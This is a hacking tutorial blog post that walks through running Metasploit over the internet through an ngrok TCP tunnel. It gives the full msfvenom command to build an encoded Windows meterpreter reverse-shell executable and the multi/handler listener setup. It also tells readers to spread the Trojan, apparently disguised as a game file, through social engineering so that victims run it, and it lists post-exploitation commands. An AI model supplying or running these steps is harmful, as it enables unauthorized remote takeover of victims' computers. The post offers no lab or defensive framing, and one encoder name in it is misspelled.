One way is to port forward the router. But today we’ll discuss one more method through which you can easily run Metasploit over WAN without any use of port forwarding because port forwarding is always a challenging task for all of us.
Process –
Create a account on ngrok.com.
Download and Configure the Ngrok package in your Kali Linux machine.
Start the TCP or HTTP service.
Create a payload with Msfvenom
Start the Listener with Metasploit Framework
Spread your Trojan over internet.
Here for 1st and 2nd step, you can check out our previous article where we hacked an Android Device by using Ngrok tunnel. We are skipping the registration and installation part of Ngrok as we already covered in previous article.
After complete installation of Ngrok, start the Ngrok TCP service on port 4444 by typing below command:
Command: ./ngrok tcp 4444You can use any port but we recommend to use 4444 for this case.
Next step is to create a malicious payload with the help of Msfvenom as follows:
Command: msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your Ngrok URL> LPORT=<Your Ngrok Port> -b “\x00” -e x86/shikhata_ga_nai -f exe -o /root/Desktop/<filename>.exe
Here -p stands for payload,
-e stands for encoder,
-o stands for output
-f stands for fileformat
Msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. Msfvenom replaced both msfpayload and msfencode as of June 8th, 2015.
Here is a list of available platforms one can enter when using the –platform switch.
Cisco or cisco
OSX or osx
Solaris or solaris
BSD or bsd
OpenBSD or openbsd
hardware
Firefox or firefox
BSDi or bsdi
NetBSD or netbsd
NodeJS or nodejs
FreeBSD or freebsd
Python or python
AIX or aix
JavaScript or javascript
HPUX or hpux
PHP or php
Irix or irix
Unix or unix
Linux or linux
Ruby or ruby
Java or java
Android or android
Netware or netware
Windows or windows
mainframe
multi
To view all encoders list, type “msfvenom -l encoders” in your terminal
When the victim clicks on the gtavicty.exe file, the meterpreter payload will be activated and will look to make a connection back to your system (LHOST). For the connection to succeed, you will need to open the multi-handler in Metasploit to receive the connection.
Start the metasploit framework by typing “msfconsole” in your terminal.
The exploit which we’ll use is “use exploit/multi/handler”
Payload is “set payload windows/meterpreter/reverse_tcp”
Here you need to set the LHOST and LPORT.
Command: set LHOST 0.0.0.0
Command: set LPORT 4444
Just type “run” in your terminal. Now you can use any social engineering method to spread your malicious executable file over the Internet.
When the victim clicks on your executable file so called as gtavicty.exe, the meterpreter session will be opened instantly.
So here, ngrok will automatically forward all the traffic to your localhost machine. Type “sysinfo” to know more about your target.
To know the process ID, just type “getpid” in same terminal.
That's it...
Tags:
Kali Linux